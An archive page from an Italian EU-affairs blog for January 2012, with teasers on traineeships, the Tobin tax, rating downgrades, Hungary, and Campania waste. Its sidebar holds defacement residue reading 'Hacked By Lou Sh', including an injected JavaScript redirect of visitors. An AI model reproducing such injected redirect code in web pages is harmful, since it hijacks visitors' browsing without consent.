EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Gennaio 2012
it

Il Parlamento europeo mette a disposizione dei cittadini la possibilità di svolgere tirocini formativi presso il proprio Segretariato generale, con l’obiettivo di partecipare direttamente alla loro formazione e promuovere la conoscenza di questa Istituzione. Per chiunque fosse interessato a prenderne parte sarà importante conoscere le norme interne relative ai tirocini e alle visite di studio presso il Segretariato generale. Qui di seguito il link per la loro visualizzazione: http://www.europarl.europa.eu/pdf/t...

Da tempo il Parlamento europeo si avvale di un programma di tirocini rivolto ai giovani che intendono iniziare la carriera all’interno delle istituzioni comunitarie o che semplicemente iniziano a muovere i primi passi nel mondo del lavoro. L’offerta del PE prevede collaborazioni, alcune (...)

it

Prima Sarkozy, poi la Merkel e Monti (con riserve). L’Europa è pronta per la Tobin tax. La tassa che ha il sapore della sfida al mondo della speculazione finanziaria, dopo il vertice italo-tedesco sembra avere ottime possibilità di applicazione, ma non mancano i dubbi sull’attuazione di una vera e propria Robin Hood tax.

Innanzitutto, cos’è la Tobin tax? Si tratta di un’imposta proporzionale applicata alle transazioni finanziarie eseguite sui mercati. La tassa andrebbe da un valore minimo dello 0,1% a un valore massimo dell’1% delle stesse operazioni effettuate. Un’imposta di tale portata permetterebbe (stando agli (...)

it

L’11 gennaio a Bruxelles è stato presentato dalla Commissione europea un esecutivo comunitario contenente 16 azioni volte a raddoppiare, entro il 2015, la quota del commercio elettronico al dettaglio, ad oggi fermo al 3,4%, e il peso dell’economia di Internet nel Pil europeo, attualmente inferiore al 3%. Secondo la Commissione infatti, commercio e servizi online, se opportunamente sfruttati, potrebbero rappresentare in alcuni degli Stati membri, come Francia, Germania, Svezia e Regno Unito, più del 20% della crescita e della creazione di nuovi posti di lavoro

Le potenzialità offerte da Internet, anche nel settore dell’economia e del commercio, sono molteplici. Tuttavia il più delle volte non sono adeguatamente sfruttata, tanto dai consumatori quanto dalle aziende. I motivi sono diversi: innanzitutto la scarsa, e a volte inesistente, conoscenza delle (...)

it

Ancora aperta la battaglia condotta dall’Italia per poter integrare nel Patto di bilancio tra i 26 stati membri, il tanto ardito rientro del debito pubblico. Bisognerà attendere il prossimo 30 gennaio per considerare definitivo il testo del Trattato intergovernativo voluto da 26 Stati membri (esclusa la Gran Bretagna) richiesto dalla Germania. Una nuova riunione si è tenuta lo scorso 12 gennaio, mentre all’Ecofin, con la presenza di Mario Monti, il testo verrà presentato il 23 gennaio.

L’obiettivo che i tre rappresentanti degli eurodeputati, il democratico italiano Roberto Gualtieri, il liberale belga Guy Verhofstadt e il cristiano-democratico tedesco Elmar Brok, hanno enunciato al momento della discussione del trattato è stato quello di formulare ’’una tabella di marcia per (...)

it

La Young Ambassadors Society ha aperto le application per reclutare la delegazione italiana che rappresenterà la nostra Nazione ai prossimi G8 & G20 Youth Summits presso la Georgetown University di Washington.

Se ti interessi di politica e credi di avere la giuste capacità per poter finalmente dire la tua in prima persona; se pensi che sia ora di cambiare le cose, ma ti guardi intorno e ti sembra che nessun Politico lo stia facendo in modo incisivo; se, come noi, condividi l’idea che i giovani debbano (...)

it

In accoglimento del ricorso presentato 4 anni fa da 18 abitanti della cittadina di Somma Vesuviana, la Corte dei Diritti dell’uomo ha emesso il suo verdetto dichiarando l’inadempienza dello Stato italiano nei confronti dei suoi cittadini per quanto riguarda la raccolta e lo smaltimento dei rifiuti in Campania. Secondo la Corte europea, l’Italia non avrebbe garantito due dei diritti presenti nella Convenzione europea dei diritti dell’uomo: il diritto alla vita e quello alla vita privata e familiare.

La piaga dei rifiuti in Campania ha avuto inizio nel lontano 1994 e si è protratta fino al 2009. Durante questo periodo lo Stato non è mai riuscito ad affrontare la situazione in modo adeguato e risolutivo lasciando così i cittadini in balia della “mondezza”. Le autorità non hanno saputo gestire e (...)

19
01
2012

Let’s go Britain!

it

Gli studenti italiani sono tra i più sfiduciati in Europa. Stando alle statistiche, su una popolazione studentesca attiva che conta 1.8 milioni di giovani iscritti a corsi di laurea di primo livello, il 3% fugge via dall'Italia per completare il proprio percorso di studi.

La mobilità giovanile, ed in particolare quella studentesca, muovono un capitale economico di oltre 30 miliardi di dollari statunitensi. Tuttavia, è facile capire come, se da una parte questa somma va ad arricchire i Paesi nelle cui università gli studenti internazionali vanno ad affluire, (...)

it

In questa settimana in molti si saranno chiesti: perché ogni volta che la borsa rialza la testa arriva la scure delle agenzie di rating? Abituati al segno meno di Piazza Affari, e al triste e nero bilancio settimanale, quando finalmente ricominciamo a sperare le agguerritissime agenzie americane non tardano a bocciare (nel gergo tecnico, declassare) gli stati e le loro economie in difficoltà. Dopo l'ondata di downgrade della scorsa settimana, appunto, ecco la nuova sberla dell'agenzia Usa agli stati UE: Standard & Poor’s ha declassato il Fondo salva-stati (Efsf della UE), sceso dalla tripla A ad AA+. Per Mario Draghi la “situazione è gravissima”, ed è il caso di “limitare il loro potere”.

Non si fa in tempo a riprendersi dal duro colpo del declassamento di diversi stati del Vecchio Continente, che S&P colpisce di nuovo: stavolta l’agenzia di rating ha tagliato il giudizio sul merito di credito del fondo salva-stati EFSF, giustificando il provvedimento proprio come conseguenza (...)

it

La presidenza di turno danese denuncia gli sprechi legati alla presenza di due sedi per il Parlamento UE (che obbliga gli eurodeputati a trasferirsi una volta al mese da Bruxelles a Strasburgo) e raccoglie il consenso unanime dei membri dell'Istituzione comunitaria

Il ministro delle Finanze danese Bjarne Corydon ha sollevato la questione inerente lo spreco di denaro dovuto all’esistenza di due sedi del Parlamento europeo, che presume lo spostamento mensile dei deputati europei con annesso staff da Bruxelles a Strasburgo per soli quattro giorni, in (...)

it

La Commissione europea intende aprire tre procedure di infrazione contro l’Ungheria per il mancato rispetto delle norme fondamentali sancite dal diritto comunitario. Le riforme in materia di stampa, di autonomia della Banca centrale e del sistema giudiziario sembrano rappresentare una svolta autoritaria dell’Ungheria.

Il primo ministro della Repubblica ungherese Viktor Orban, e leader del partito di maggioranza Fidesz, lo scorso dicembre ha varato la nuova Costituzione ungherese, forte del pieno appoggio parlamentare e della legge elettorale che permette al governo di poter riformare la costituzione con due (...)

it

Eletto presidente con 387 voti su un totale di 670 voti validi, Schultz facendo menzione delle sue origini riconosce a se stesso il ruolo di social-democratico. Fino a questo momento capo del gruppo dell’Alleanza dei socialisti e democratici all’Europarlamento, appare ora pronto a promuovere un programma basato sul dialogo e finalizzato al raggiungimento del bene comune. Nel suo discorso di insediamento non manca di rendere omaggio al suo predecessore, il polacco Jerzy Buzek.

È stato eletto lo scorso 17 gennaio il nuovo presidente del Parlamento europeo. Con 387 voti su 670 la scelta è ricaduta sul socialdemocratico tedesco Martin Schultz, 57 anni, succeduto al conservatore polacco Jerzy Buzek. Insieme a lui, candidati alla presidenza erano il conservatore tedesco (...)

it

È finalmente online, dal 16 gennaio e fino alle 18 del 3 febbraio, il primo bando MAE e Fondazione CRUI per il 2012. Tutti gli studenti laureandi o neolaureati interessati, e che presentino i requisiti indicati, potranno mettersi alla prova con un’offerta di stage, della durata massima di quattro mesi, presso le sedi del Ministero degli Affari Esteri di Roma e di tutto il mondo.

Inserirsi nel mondo del lavoro, si sa, non è mai facile. Curriculum da inviare e colloqui da sostenere, sono solo una piccola parte di quello con cui bisogna confrontarsi. Porte chiuse in faccia, e una lista interminabile di requisiti necessari anche per quello che, apparentemente, sembra il (...)

it

Per contrastare il crescente abbandono scolastico da parte di molti giovani di ogni parte d'Europa, la Commissione europea ha approvato il programma “Opportunità per i giovani”.

L’iniziativa della Commissione, approvata lo scorso dicembre, intende dare voce alle crescenti proteste dei ragazzi europei preoccupati per il loro futuro lavorativo. La preoccupazione maggiore è che la concomitanza di più fattori quali crescente inattività, situazione lavorativa precaria e (...)

it

La riduzione del tasso di natalità nel nostro continente ha spinto l'UE a porre l'attenzione sulla generazione passata, cercando di farla comprendere ai più giovani e di sfruttare al massimo le potenzialità derivanti dall'esperienza che queste possiedono.

Il 2012 è l’anno europeo dell’invecchiamento attivo e della solidarietà tra le generazioni. Per l’Italia il coordinamento dell’operazione è affidato al Dipartimento per le politiche della famiglia, il quale si propone di trasformare la concezione negativa di invecchiamento in un qualcosa di positivo, (...)

it

Il “sì” conquista la maggioranza alle urne con il 66,3% nel referendum del 22 gennaio scorso dando così il via libera all’ingresso dell’ex Stato jugoslavo in Europa.

Il 66,3% dei partecipanti al referendum ha espresso il proprio voto favorevole per l’entrata nell’Unione europea. Il fronte dei “no” si è attestato intorno al 33% ma a suscitare qualche malumore è stata la bassa affluenza alle urne che non ha raggiunto il 45% (per la precisione il 43%) anche in (...)

it

L'evento è rivolto a tutti gli studenti, dai più piccoli ai più grandi, i quali dovranno scrivere un testo o una poesia che evidenzino il senso di appartenenza all'Unione europea, ma anche una certa conoscenza dell'istituzione comunitaria

In questo periodo dove lo straniero sembra far quasi paura, dove la diversità rende i giovani (e non solo) diffidenti verso persone provenienti da un’altra area geografica, la Commissione europea ha deciso di rinnovare il concorso "Viaggio in Europa" anche per il 2012, sperando che l’interazione (...)

it

Con una maggioranza schiacciante di 630 sì, lo scorso giovedì 19 gennaio a Strasburgo, è stata approvata dal Parlamento europeo una nuova direttiva in materia di smaltimento dei rifiuti elettronici, che aggiorna la precedente direttiva del 2003. Il pacchetto legislativo prevede in particolare: obiettivi più ambiziosi per lo smaltimento dei rifiuti, e la possibilità per i consumatori di consegnare direttamente ai rivenditori i piccoli apparecchi da smaltire.

Comprare un nuovo elettrodomestico, una Tv, o anche un semplice cellulare, e non sapere bene come fare per smaltire quello vecchio sarà sicuramente successo, almeno una volta, ad ognuno di noi. E così, ecco che milioni di apparecchiature elettroniche – talvolta anche pericolose per l’ambiente – (...)

it

I ragazzi selezionati avranno l'opportunità di entrare a far parte del personale che opera nei campi amministrativi presso le istituzioni dell'Unione europea

Il "Corso intensivo di preparazione al concorso per Administrators presso le istituzioni dell’Unione europea" si articolerà in due giornate, il 24 ed il 25 febbraio. I responsabili hanno deciso in questo modo per dare risalto rispettivamente alle conoscenze teoriche e pratiche, le quali dovranno (...)

it

Nell’incontro del 25 gennaio, svoltosi a Bruxelles, sono emerse nuove soluzioni per il problema rifiuti. Sono stati sbloccati parzialmente i fondi che saranno utilizzati solo rispettando la ‘gerarchia’ prevista per il trattamento dei rifiuti. Ed, inoltre, è stata scongiurata la multa concedendo nuova fiducia al piano Campania.

È stato fissato per il prossimo giugno il limite massimo entro il quale verranno fornite soluzioni concrete per far fronte al problema dei rifiuti in Campania. Questo quanto accordato nell’incontro tenutosi il 25 gennaio a Bruxelles tra il commissario europeo Potocnik, il ministro dell’Ambiente (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France